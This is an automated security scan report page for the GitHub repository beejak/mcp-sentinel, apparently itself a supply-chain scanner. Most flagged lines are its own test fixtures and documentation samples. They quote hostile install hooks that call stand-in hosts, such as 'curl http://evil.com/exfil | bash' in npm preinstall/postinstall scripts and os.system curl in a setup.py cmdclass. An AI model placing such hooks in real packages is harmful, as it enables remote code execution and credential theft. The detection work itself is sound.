Is beejak/mcp-sentinel safe to install?

beejak/mcp-sentinel was flagged as CRITICAL RISK (risk score 51665) with 3622 findings detected across 312 files. Review the findings before installing.

What security issues were found in beejak/mcp-sentinel?

Sigil detected 3622 findings in beejak/mcp-sentinel, including patterns related to provenance, code_patterns, credentials, network_exfil, obfuscation, install_hooks. See the full scan report for details.

beejak/mcp-sentinel Security Scan — CRITICAL RISK | Sigil

install-setup-py-cmdclass

CRITICAL

setup.py overrides cmdclass — may execute code during install

repo/docs/TEST_COVERAGE.md:191

| `test_encoded_payload_code_snippet_captured` | Code snippet contains `base64` |
| `test_detect_setup_py_cmdclass` | `cmdclass={'install': CustomInstall}` with shell call in setup.py → HIGH |
| `test_detect_npm_postinstall_hook` | `"postinstall": "curl ... \| bash"` in package.json → HIGH |

Why was this flagged?

This package overrides Python's setup.py cmdclass, which allows arbitrary code to execute during pip install. This is the primary attack vector for malicious PyPI packages — attackers use it to steal credentials, install backdoors, or download additional payloads before the developer ever runs the code. Rated CRITICAL because it executes automatically with no user interaction required.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/docs/TEST_COVERAGE.md:192

| `test_detect_setup_py_cmdclass` | `cmdclass={'install': CustomInstall}` with shell call in setup.py → HIGH |
| `test_detect_npm_postinstall_hook` | `"postinstall": "curl ... \| bash"` in package.json → HIGH |
| `test_detect_subprocess_curl_in_setup` | `subprocess.call(['curl', ...])` in setup.py → HIGH |

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/docs/TEST_COVERAGE.md:194

| `test_detect_subprocess_curl_in_setup` | `subprocess.call(['curl', ...])` in setup.py → HIGH |
| `test_no_false_positive_npm_build_hook` | `"postinstall": "node ./scripts/build.js"` not flagged |
| `test_detect_requests_in_setup_py` | `requests.post(...)` inside setup.py → CRITICAL |

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/docs/TEST_COVERAGE.md:225

| `test_detect_bcc_add_header` | `msg.add_header('Bcc', 'spy@...')` → HIGH |
| `test_detect_npm_preinstall_hook` | `"preinstall": "curl ... \| bash"` → HIGH |
| `test_detect_index_url_config_override` | `index-url = https://my.private-registry.io/` in pip.conf → MEDIUM |

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/docs/TEST_COVERAGE.md:192

| `test_detect_setup_py_cmdclass` | `cmdclass={'install': CustomInstall}` with shell call in setup.py → HIGH |
| `test_detect_npm_postinstall_hook` | `"postinstall": "curl ... \| bash"` in package.json → HIGH |
| `test_detect_subprocess_curl_in_setup` | `subprocess.call(['curl', ...])` in setup.py → HIGH |

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/docs/TEST_COVERAGE.md:225

| `test_detect_bcc_add_header` | `msg.add_header('Bcc', 'spy@...')` → HIGH |
| `test_detect_npm_preinstall_hook` | `"preinstall": "curl ... \| bash"` → HIGH |
| `test_detect_index_url_config_override` | `index-url = https://my.private-registry.io/` in pip.conf → MEDIUM |

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-pip-setup-exec

CRITICAL

setup.py executes code at install time

repo/docs/archive/historical/IMPLEMENTATION.md:24

- `audit` - Comprehensive audit (Phase 2/4)
- `init` - Configuration setup (Phase 2)
- `whitelist` - Whitelist management (Phase 4)

Why was this flagged?

This setup.py calls subprocess, os.system, exec, or eval during package installation. Legitimate packages rarely need to execute arbitrary commands at install time. This pattern is commonly used by malicious packages to download and run payloads, exfiltrate environment variables, or establish persistence. Rated CRITICAL because it runs with the installer's full permissions.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/docs/archive/phase2/PHASE_2_6_COMPLETE.md:211

  "scripts": {
    "postinstall": "curl http://malicious.com/script.sh | bash"
  }

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/docs/archive/phase2/PHASE_2_6_COMPLETE.md:193

1. **Malicious Install Scripts** (preinstall, postinstall)
   - `curl | bash`, `wget | sh`
   - Remote code execution patterns

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/docs/archive/phase2/PHASE_2_6_COMPLETE.md:211

  "scripts": {
    "postinstall": "curl http://malicious.com/script.sh | bash"
  }

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/docs/archive/phase2/PHASE_2_6_FINAL_REVIEW.md:86

**Detection Coverage:**
- ✅ `curl \| bash`, `wget \| sh` remote execution
- ✅ `eval()` in install scripts

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/docs/archive/releases/RELEASE_NOTES_v2.6.0.md:57

#### Malicious Install Scripts (7 patterns)
- `curl | bash` and `wget | sh` - Remote code execution in install hooks
- `eval()` in scripts - Code injection via package.json

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/docs/IDE_INTEGRATION_PLAN.md:668

# Install Rust for Language Server development
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/docs/TEST_STRATEGY.md:1020

          # Install Ollama for local LLM tests
          curl -fsSL https://ollama.com/install.sh | sh
          ollama pull llama3.2:8b

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/docs/releases/RELEASE_NOTES_v2.6.0.md:57

#### Malicious Install Scripts (7 patterns)
- `curl | bash` and `wget | sh` - Remote code execution in install hooks
- `eval()` in scripts - Code injection via package.json

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/docs/samples/scan_results_v2.6.0.json:37

      },
      "code_snippet": "\"postinstall\": \"curl https://malicious.com/install.sh | bash\"",
      "impact": "Arbitrary code execution during npm install. Attacker can steal credentials, inject backdoors, or compromise the entire system.",

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/rust-legacy/docs/samples/terminal_output_v2.6.0.txt:61

Code:
  > "postinstall": "curl https://malicious.com/install.sh | bash"

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/docs/samples/terminal_output_v2.6.0.txt:61

Code:
  > "postinstall": "curl https://malicious.com/install.sh | bash"

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/rust-legacy/src/detectors/package_confusion.rs:331

            "scripts": {
                "preinstall": "curl http://malicious.com/script.sh | bash"
            }

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/src/detectors/package_confusion.rs:331

            "scripts": {
                "preinstall": "curl http://malicious.com/script.sh | bash"
            }

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/src/providers/ollama.rs:23

//! # Install Ollama
//! curl -fsSL https://ollama.com/install.sh | sh
//!

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/src/providers/ollama.rs:195

                To install Ollama:\n\
                  curl -fsSL https://ollama.com/install.sh | sh\n\n\
                To start Ollama:\n\

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/rust-legacy/tests/integration_phase_2_6.rs:98

    "scripts": {
        "preinstall": "curl http://malicious.com/script.sh | bash",
        "postinstall": "node scripts/setup.js"

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/rust-legacy/tests/integration_phase_2_6.rs:99

        "preinstall": "curl http://malicious.com/script.sh | bash",
        "postinstall": "node scripts/setup.js"
    }

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/rust-legacy/tests/integration_phase_2_6.rs:98

    "scripts": {
        "preinstall": "curl http://malicious.com/script.sh | bash",
        "postinstall": "node scripts/setup.js"

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-setup-py-cmdclass

CRITICAL

setup.py overrides cmdclass — may execute code during install

repo/tests/unit/test_supply_chain.py:144

async def test_detect_setup_py_cmdclass(detector):
    content = "class CustomInstall(install):\n    def run(self):\n        os.system('curl http://evil.com')\n\nsetup(cmdclass={'install': CustomInstall})"
    vulns = await detector.detect(Path("setup.py"), content)

Why was this flagged?

This package overrides Python's setup.py cmdclass, which allows arbitrary code to execute during pip install. This is the primary attack vector for malicious PyPI packages — attackers use it to steal credentials, install backdoors, or download additional payloads before the developer ever runs the code. Rated CRITICAL because it executes automatically with no user interaction required.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/tests/unit/test_supply_chain.py:150

async def test_detect_npm_postinstall_hook(detector):
    content = '{"scripts": {"postinstall": "curl http://evil.com/exfil | bash"}}'
    vulns = await detector.detect(Path("package.json"), content)

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/tests/unit/test_supply_chain.py:163

async def test_no_false_positive_npm_build_hook(detector):
    content = '{"scripts": {"postinstall": "node ./scripts/build.js"}}'
    vulns = await detector.detect(Path("package.json"), content)

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

repo/tests/unit/test_supply_chain.py:403

async def test_detect_npm_preinstall_hook(detector):
    content = '{"scripts": {"preinstall": "curl http://evil.com | bash"}}'
    vulns = await detector.detect(Path("package.json"), content)

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-pip-setup-exec

CRITICAL

setup.py executes code at install time

repo/tests/unit/test_supply_chain.py:144

async def test_detect_setup_py_cmdclass(detector):
    content = "class CustomInstall(install):\n    def run(self):\n        os.system('curl http://evil.com')\n\nsetup(cmdclass={'install': CustomInstall})"
    vulns = await detector.detect(Path("setup.py"), content)

Why was this flagged?

This setup.py calls subprocess, os.system, exec, or eval during package installation. Legitimate packages rarely need to execute arbitrary commands at install time. This pattern is commonly used by malicious packages to download and run payloads, exfiltrate environment variables, or establish persistence. Rated CRITICAL because it runs with the installer's full permissions.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/tests/unit/test_supply_chain.py:150

async def test_detect_npm_postinstall_hook(detector):
    content = '{"scripts": {"postinstall": "curl http://evil.com/exfil | bash"}}'
    vulns = await detector.detect(Path("package.json"), content)

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

repo/tests/unit/test_supply_chain.py:403

async def test_detect_npm_preinstall_hook(detector):
    content = '{"scripts": {"preinstall": "curl http://evil.com | bash"}}'
    vulns = await detector.detect(Path("package.json"), content)

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

beejak/mcp-sentinel

Summary

Provenance

Findings by Phase

Install Hooks

Code Patterns

Obfuscation

Network / Exfiltration

Credentials

Provenance

Badge

Scan your own packages

Get threat intelligence and product updates

Other github scans